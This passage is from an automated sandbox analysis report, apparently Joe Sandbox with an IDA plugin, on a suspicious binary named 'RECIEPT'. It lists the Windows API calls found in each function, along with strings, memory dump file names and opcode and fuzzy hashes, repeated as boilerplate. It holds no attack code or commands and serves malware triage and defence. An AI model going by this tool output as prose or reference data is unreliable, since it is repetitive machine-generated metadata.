                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ErrorMode$InformationVolume
                                        • String ID: \VH
                                        • API String ID: 2507767853-234962358
                                        • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                        • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                        • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                        • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                        APIs
                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                        • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: msctls_trackbar32
                                        • API String ID: 3850602802-1010561917
                                        • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                        • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                        • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                        • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                        APIs
                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                        • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                        • String ID: crts
                                        • API String ID: 943502515-3724388283
                                        • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                        • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                        • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                        • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                        • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                        • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ErrorMode$LabelVolume
                                        • String ID: \VH
                                        • API String ID: 2006950084-234962358
                                        • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                        • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                        • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                        • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                        APIs
                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                        • GetMenuItemInfoW.USER32 ref: 00449727
                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                        • DrawMenuBar.USER32 ref: 00449761
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Menu$InfoItem$Draw_malloc
                                        • String ID: 0
                                        • API String ID: 772068139-4108050209
                                        • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                        • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                        • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                        • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _wcslen$_wcscpy
                                        • String ID: 3, 3, 8, 1
                                        • API String ID: 3469035223-357260408
                                        • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                        • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                        • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                        • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                        APIs
                                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                        • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: ICMP.DLL$IcmpCloseHandle
                                        • API String ID: 2574300362-3530519716
                                        • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                        • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                        • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                        • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                        APIs
                                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                        • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: ICMP.DLL$IcmpCreateFile
                                        • API String ID: 2574300362-275556492
                                        • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                        • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                        • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                        • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                        APIs
                                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                        • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: ICMP.DLL$IcmpSendEcho
                                        • API String ID: 2574300362-58917771
                                        • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                        • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                        • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                        • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                        APIs
                                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                        • API String ID: 2574300362-4033151799
                                        • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                        • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                        • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                        • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                        APIs
                                        • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                        • __itow.LIBCMT ref: 004699CD
                                          • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                        • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                        • __itow.LIBCMT ref: 00469A97
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: MessageSend$__itow
                                        • String ID:
                                        • API String ID: 3379773720-0
                                        • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                        • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                        • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                        • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 00449A4A
                                        • ScreenToClient.USER32(?,?), ref: 00449A80
                                        • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Window$ClientMoveRectScreen
                                        • String ID:
                                        • API String ID: 3880355969-0
                                        • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                        • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                        • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                        • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                        • String ID:
                                        • API String ID: 2782032738-0
                                        • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                        • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                        • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                        • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                        APIs
                                        • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                        • GetWindowRect.USER32(?,?), ref: 00441722
                                        • PtInRect.USER32(?,?,?), ref: 00441734
                                        • MessageBeep.USER32(00000000), ref: 004417AD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Rect$BeepClientMessageScreenWindow
                                        • String ID:
                                        • API String ID: 1352109105-0
                                        • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                        • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                        • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                        • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                        APIs
                                        • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                        • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                        • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                        • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                        • String ID:
                                        • API String ID: 3321077145-0
                                        • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                        • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                        • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                        • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                        APIs
                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                        • __isleadbyte_l.LIBCMT ref: 004208A6
                                        • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                        • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                        • String ID:
                                        • API String ID: 3058430110-0
                                        • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                        • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                        • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                        • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                        APIs
                                        • GetParent.USER32(?), ref: 004503C8
                                        • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
